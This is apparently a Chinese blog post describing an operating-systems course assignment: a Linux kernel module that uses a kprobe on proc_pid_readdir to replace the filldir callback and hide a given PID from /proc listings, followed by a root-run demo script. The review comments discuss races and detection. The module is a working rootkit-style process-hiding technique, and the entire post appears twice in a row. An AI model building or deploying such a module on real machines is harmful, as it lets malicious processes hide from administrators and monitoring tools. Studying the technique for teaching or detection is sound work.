Linux内核通过inline hook实现隐藏进程
2012-12-17 10:49
这是我们操作系统的大作业。
原理是用 kprobe 在 proc 文件系统根目录的 readdir 函数（proc_pid_readdir）入口处下断点，在 pre_handler 里改写保存下来的寄存器。严格说这不是手工改写指令的 inline hook，而是借助内核自带的 kprobes 机制，效果类似。
改写的是第三个参数，也就是 filldir 回调：换成自己的版本后，遇到要隐藏的 pid 对应的目录项直接返回 0 跳过，其余目录项转交给原来的回调。注意这只过滤了对 /proc 的目录列举，直接打开 /proc/<pid> 的路径并没有被改动。
代码爆短,60来行。
Ubuntu 10.04 测试可用。代码从 regs->cx 取第三个参数，这是 32 位 x86 内核（-mregparm=3）的调用约定；在 x86-64 上第三个参数在 rdx（regs->dx），需要相应修改。
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/fs.h>
/*
 * Redundant re-declaration: <linux/kprobes.h> (included above) already
 * declares register_kprobe() with this signature. Harmless, kept as-is.
 */
int register_kprobe(struct kprobe *kp);
/*
 * The probe point: proc_pid_readdir(), the readdir implementation for the
 * /proc root. Only the symbol name is given here; register_kprobe() resolves
 * it to an address (kp.addr, which k_init() prints afterwards), and the
 * pre_handler is attached in k_init() just before registration.
 */
static struct kprobe kp = { .symbol_name = "proc_pid_readdir" };
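/*
 * The original filldir callback captured from the hooked proc_pid_readdir()
 * call; filldir() chains to it for every entry that is not hidden.
 *
 * NOTE(review): this is a single global slot written on every probed call.
 * If two concurrent readdir() calls on /proc arrive with different callbacks
 * (the kernel has more than one filldir_t implementation), the second one
 * overwrites the first and the chained call ends up at the wrong function.
 * handler_pre() is where that would have to be guarded.
 */
static filldir_t old_filldir;

/* PID whose /proc/<pid> entry is suppressed; set with insmod ... pid=<n>. */
static int pid;

/*
 * Exposed as /sys/module/<name>/parameters/pid. The original used 0744;
 * the execute bits have no meaning for a sysfs attribute, so 0644 gives
 * the same read/write access without them. Note that a world-readable
 * parameter tells any local user exactly which PID is being hidden; a
 * module that cared would use 0600, or 0 to not export it at all.
 */
module_param(pid, int, 0644);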
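/*
 * Replacement filldir callback installed by handler_pre().
 *
 * Drops the directory entry whose name is exactly the decimal form of the
 * hidden PID and forwards every other entry to the original callback.
 *
 * @__buf:   opaque cursor owned by the original callback, passed through
 * @name:    entry name, namlen bytes (not assumed to be NUL-terminated)
 * @namlen:  length of @name
 * @offset:  directory offset, passed through
 * @ino:     inode number, passed through
 * @d_type:  entry type, passed through
 *
 * Returns 0 for the suppressed entry - the value a successful callback
 * returns, so the caller carries on as if it had been emitted - and
 * otherwise whatever old_filldir() returns.
 *
 * The name is parsed by hand over exactly namlen bytes. The original did
 * sscanf(name, "%d", &p) with p uninitialized: for a non-numeric /proc entry
 * ("self", "cpuinfo", ...) sscanf stored nothing and garbage was compared
 * against pid, and a name like "123abc" would have matched pid 123.
 */
static int filldir(void *__buf, const char *name, int namlen, loff_t offset,
		   u64 ino, unsigned int d_type)
{
	int i;
	int value = 0;
	int is_number = namlen > 0;

	for (i = 0; i < namlen && is_number; i++) {
		if (name[i] < '0' || name[i] > '9') {
			is_number = 0;
		} else if (value > (INT_MAX - (name[i] - '0')) / 10) {
			/* Would overflow int: cannot be a PID, and must not be UB. */
			is_number = 0;
		} else {
			value = value * 10 + (name[i] - '0');
		}
	}

	if (is_number && value == pid)
		return 0;

	return old_filldir(__buf, name, namlen, offset, ino, d_type);
}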
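/*
 * kprobe pre_handler: runs just before the first instruction of
 * proc_pid_readdir(), with the caller's register state in *regs.
 * It remembers the third argument (the filldir_t callback) in old_filldir
 * and replaces it with our filldir().
 *
 * Which register carries the third argument is ABI-specific. On 32-bit x86
 * the kernel is built with -mregparm=3, so it is ECX (regs->cx) - which is
 * all the original handled, presumably matching the 32-bit "Ubuntu 10.04"
 * test setup. On x86-64 the SysV ABI passes it in RDX (regs->dx); patching
 * cx there would leave the real callback untouched and hide nothing.
 *
 * @pr:   the registered probe (unused)
 * @regs: saved registers at the probe point; the argument register is
 *        modified in place
 *
 * Always returns 0 so the probed instruction is executed normally.
 */
static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
{
#ifdef CONFIG_X86_64
	unsigned long *arg3 = &regs->dx;
#else
	unsigned long *arg3 = &regs->cx;
#endif
	filldir_t incoming = (filldir_t)*arg3;

	/* Our own callback is already in place: nothing to swap. */
	if (incoming == filldir)
		return 0;

	/*
	 * old_filldir is a single global slot. If a concurrent readdir()
	 * already parked a different callback there, leave this call
	 * unhooked rather than chain it to the wrong function later.
	 */
	if (old_filldir && old_filldir != incoming)
		return 0;

	old_filldir = incoming;
	*arg3 = (unsigned long)filldir;
	return 0;
}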
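/*
 * Module entry point: validates the "pid" parameter, attaches the
 * pre_handler to the probe and registers it on proc_pid_readdir().
 *
 * Returns 0 on success, -EINVAL for a non-positive pid, or the negative
 * error code that register_kprobe() returned.
 */
static int __init k_init(void)
{
	int ret;

	/*
	 * PIDs are positive. With the default of 0 (or a negative value) the
	 * module would load successfully but hide nothing, which is confusing
	 * to debug - refuse to load instead.
	 */
	if (pid <= 0) {
		printk(KERN_INFO "invalid pid %d (pass pid=<positive pid>)\n", pid);
		return -EINVAL;
	}

	kp.pre_handler = handler_pre;

	ret = register_kprobe(&kp);
	if (ret < 0) {
		printk(KERN_INFO "register_kprobe failed, returned %d\n", ret);
		return ret;
	}

	/*
	 * Writes the probed kernel text address and the hidden PID to the
	 * kernel log. Anyone who can read dmesg learns both, which rather
	 * defeats the hiding - acceptable for a class exercise, not beyond.
	 */
	printk(KERN_INFO "Planted kprobe at %p; pid %d\n", kp.addr, pid);

	return 0;
}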
/*
 * Module exit: removes the probe and reports it in the kernel log.
 *
 * NOTE(review): unregistering the probe stops new proc_pid_readdir() calls
 * from being redirected, but a call that already received our filldir() as
 * its callback before the unregister may still be running when the module
 * text is freed on rmmod. Nothing in this listing waits for such callers;
 * a production driver would need to track in-flight users before unloading.
 */
static void __exit k_exit(void)
{
unregister_kprobe(&kp);
printk(KERN_INFO "kprobe at %p unregistered\n", kp.addr);
}
module_init(k_init);
module_exit(k_exit);
/*
 * A GPL-compatible license string is needed here: the kprobes API the
 * module links against is, as far as I recall, exported GPL-only, so a
 * non-GPL module would fail to load - confirm against the target kernel.
 */
MODULE_LICENSE("GPL");
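#!/bin/sh
# Demo driver: start a long-lived background process, show it in the process
# list, load the module with pid=<that pid>, show it is gone, unload the
# module, show it is back. Needs root (insmod/rmmod) and k.ko built for the
# running kernel in the current directory.

if [ "$(id -u)" -ne 0 ]; then
	echo "this demo needs root for insmod/rmmod" >&2
	exit 1
fi

sleep 1000 &
# $! is the pid of the sleep just started; `jobs -p` would list every
# background job of this shell, not just this one.
pid=$!
# Do not leave the sleep behind, whatever happens below.
trap 'kill "$pid" 2>/dev/null' EXIT

# The module only filters the /proc directory listing, so the check must go
# through an enumerating ps. A bare "grep $pid" on ps output also matched any
# other line containing those digits (other pids, memory columns, the grep
# process itself); match the pid column exactly instead.
show() {
	ps aux | awk -v p="$pid" '$2 == p'
}

echo 'before hide'
show

insmod k.ko pid="$pid"
echo 'after hide'
show
# Only readdir is hooked; opening /proc/<pid> directly should still work,
# which is also how such a module is typically detected.
ls -d "/proc/$pid"

rmmod k.ko
echo 'after unhide'
show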
原理是用 kprobe 在 proc 文件系统根目录的 readdir 函数（proc_pid_readdir）入口处下断点，在 pre_handler 里改写保存下来的寄存器。严格说这不是手工改写指令的 inline hook，而是借助内核自带的 kprobes 机制，效果类似。
改写的是第三个参数，也就是 filldir 回调：换成自己的版本后，遇到要隐藏的 pid 对应的目录项直接返回 0 跳过，其余目录项转交给原来的回调。注意这只过滤了对 /proc 的目录列举，直接打开 /proc/<pid> 的路径并没有被改动。
代码爆短,60来行。
Ubuntu 10.04 测试可用。代码从 regs->cx 取第三个参数，这是 32 位 x86 内核（-mregparm=3）的调用约定；在 x86-64 上第三个参数在 rdx（regs->dx），需要相应修改。
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/fs.h>
/*
 * Redundant re-declaration: <linux/kprobes.h> (included above) already
 * declares register_kprobe() with this signature. Harmless, kept as-is.
 */
int register_kprobe(struct kprobe *kp);
/*
 * The probe point: proc_pid_readdir(), the readdir implementation for the
 * /proc root. Only the symbol name is given here; register_kprobe() resolves
 * it to an address (kp.addr, which k_init() prints afterwards), and the
 * pre_handler is attached in k_init() just before registration.
 */
static struct kprobe kp = { .symbol_name = "proc_pid_readdir" };
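/*
 * The original filldir callback captured from the hooked proc_pid_readdir()
 * call; filldir() chains to it for every entry that is not hidden.
 *
 * NOTE(review): this is a single global slot written on every probed call.
 * If two concurrent readdir() calls on /proc arrive with different callbacks
 * (the kernel has more than one filldir_t implementation), the second one
 * overwrites the first and the chained call ends up at the wrong function.
 * handler_pre() is where that would have to be guarded.
 */
static filldir_t old_filldir;

/* PID whose /proc/<pid> entry is suppressed; set with insmod ... pid=<n>. */
static int pid;

/*
 * Exposed as /sys/module/<name>/parameters/pid. The original used 0744;
 * the execute bits have no meaning for a sysfs attribute, so 0644 gives
 * the same read/write access without them. Note that a world-readable
 * parameter tells any local user exactly which PID is being hidden; a
 * module that cared would use 0600, or 0 to not export it at all.
 */
module_param(pid, int, 0644);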
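/*
 * Replacement filldir callback installed by handler_pre().
 *
 * Drops the directory entry whose name is exactly the decimal form of the
 * hidden PID and forwards every other entry to the original callback.
 *
 * @__buf:   opaque cursor owned by the original callback, passed through
 * @name:    entry name, namlen bytes (not assumed to be NUL-terminated)
 * @namlen:  length of @name
 * @offset:  directory offset, passed through
 * @ino:     inode number, passed through
 * @d_type:  entry type, passed through
 *
 * Returns 0 for the suppressed entry - the value a successful callback
 * returns, so the caller carries on as if it had been emitted - and
 * otherwise whatever old_filldir() returns.
 *
 * The name is parsed by hand over exactly namlen bytes. The original did
 * sscanf(name, "%d", &p) with p uninitialized: for a non-numeric /proc entry
 * ("self", "cpuinfo", ...) sscanf stored nothing and garbage was compared
 * against pid, and a name like "123abc" would have matched pid 123.
 */
static int filldir(void *__buf, const char *name, int namlen, loff_t offset,
		   u64 ino, unsigned int d_type)
{
	int i;
	int value = 0;
	int is_number = namlen > 0;

	for (i = 0; i < namlen && is_number; i++) {
		if (name[i] < '0' || name[i] > '9') {
			is_number = 0;
		} else if (value > (INT_MAX - (name[i] - '0')) / 10) {
			/* Would overflow int: cannot be a PID, and must not be UB. */
			is_number = 0;
		} else {
			value = value * 10 + (name[i] - '0');
		}
	}

	if (is_number && value == pid)
		return 0;

	return old_filldir(__buf, name, namlen, offset, ino, d_type);
}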
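/*
 * kprobe pre_handler: runs just before the first instruction of
 * proc_pid_readdir(), with the caller's register state in *regs.
 * It remembers the third argument (the filldir_t callback) in old_filldir
 * and replaces it with our filldir().
 *
 * Which register carries the third argument is ABI-specific. On 32-bit x86
 * the kernel is built with -mregparm=3, so it is ECX (regs->cx) - which is
 * all the original handled, presumably matching the 32-bit "Ubuntu 10.04"
 * test setup. On x86-64 the SysV ABI passes it in RDX (regs->dx); patching
 * cx there would leave the real callback untouched and hide nothing.
 *
 * @pr:   the registered probe (unused)
 * @regs: saved registers at the probe point; the argument register is
 *        modified in place
 *
 * Always returns 0 so the probed instruction is executed normally.
 */
static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
{
#ifdef CONFIG_X86_64
	unsigned long *arg3 = &regs->dx;
#else
	unsigned long *arg3 = &regs->cx;
#endif
	filldir_t incoming = (filldir_t)*arg3;

	/* Our own callback is already in place: nothing to swap. */
	if (incoming == filldir)
		return 0;

	/*
	 * old_filldir is a single global slot. If a concurrent readdir()
	 * already parked a different callback there, leave this call
	 * unhooked rather than chain it to the wrong function later.
	 */
	if (old_filldir && old_filldir != incoming)
		return 0;

	old_filldir = incoming;
	*arg3 = (unsigned long)filldir;
	return 0;
}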
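/*
 * Module entry point: validates the "pid" parameter, attaches the
 * pre_handler to the probe and registers it on proc_pid_readdir().
 *
 * Returns 0 on success, -EINVAL for a non-positive pid, or the negative
 * error code that register_kprobe() returned.
 */
static int __init k_init(void)
{
	int ret;

	/*
	 * PIDs are positive. With the default of 0 (or a negative value) the
	 * module would load successfully but hide nothing, which is confusing
	 * to debug - refuse to load instead.
	 */
	if (pid <= 0) {
		printk(KERN_INFO "invalid pid %d (pass pid=<positive pid>)\n", pid);
		return -EINVAL;
	}

	kp.pre_handler = handler_pre;

	ret = register_kprobe(&kp);
	if (ret < 0) {
		printk(KERN_INFO "register_kprobe failed, returned %d\n", ret);
		return ret;
	}

	/*
	 * Writes the probed kernel text address and the hidden PID to the
	 * kernel log. Anyone who can read dmesg learns both, which rather
	 * defeats the hiding - acceptable for a class exercise, not beyond.
	 */
	printk(KERN_INFO "Planted kprobe at %p; pid %d\n", kp.addr, pid);

	return 0;
}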
/*
 * Module exit: removes the probe and reports it in the kernel log.
 *
 * NOTE(review): unregistering the probe stops new proc_pid_readdir() calls
 * from being redirected, but a call that already received our filldir() as
 * its callback before the unregister may still be running when the module
 * text is freed on rmmod. Nothing in this listing waits for such callers;
 * a production driver would need to track in-flight users before unloading.
 */
static void __exit k_exit(void)
{
unregister_kprobe(&kp);
printk(KERN_INFO "kprobe at %p unregistered\n", kp.addr);
}
module_init(k_init);
module_exit(k_exit);
/*
 * A GPL-compatible license string is needed here: the kprobes API the
 * module links against is, as far as I recall, exported GPL-only, so a
 * non-GPL module would fail to load - confirm against the target kernel.
 */
MODULE_LICENSE("GPL");
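#!/bin/sh
# Demo driver: start a long-lived background process, show it in the process
# list, load the module with pid=<that pid>, show it is gone, unload the
# module, show it is back. Needs root (insmod/rmmod) and k.ko built for the
# running kernel in the current directory.

if [ "$(id -u)" -ne 0 ]; then
	echo "this demo needs root for insmod/rmmod" >&2
	exit 1
fi

sleep 1000 &
# $! is the pid of the sleep just started; `jobs -p` would list every
# background job of this shell, not just this one.
pid=$!
# Do not leave the sleep behind, whatever happens below.
trap 'kill "$pid" 2>/dev/null' EXIT

# The module only filters the /proc directory listing, so the check must go
# through an enumerating ps. A bare "grep $pid" on ps output also matched any
# other line containing those digits (other pids, memory columns, the grep
# process itself); match the pid column exactly instead.
show() {
	ps aux | awk -v p="$pid" '$2 == p'
}

echo 'before hide'
show

insmod k.ko pid="$pid"
echo 'after hide'
show
# Only readdir is hooked; opening /proc/<pid> directly should still work,
# which is also how such a module is typically detected.
ls -d "/proc/$pid"

rmmod k.ko
echo 'after unhide'
show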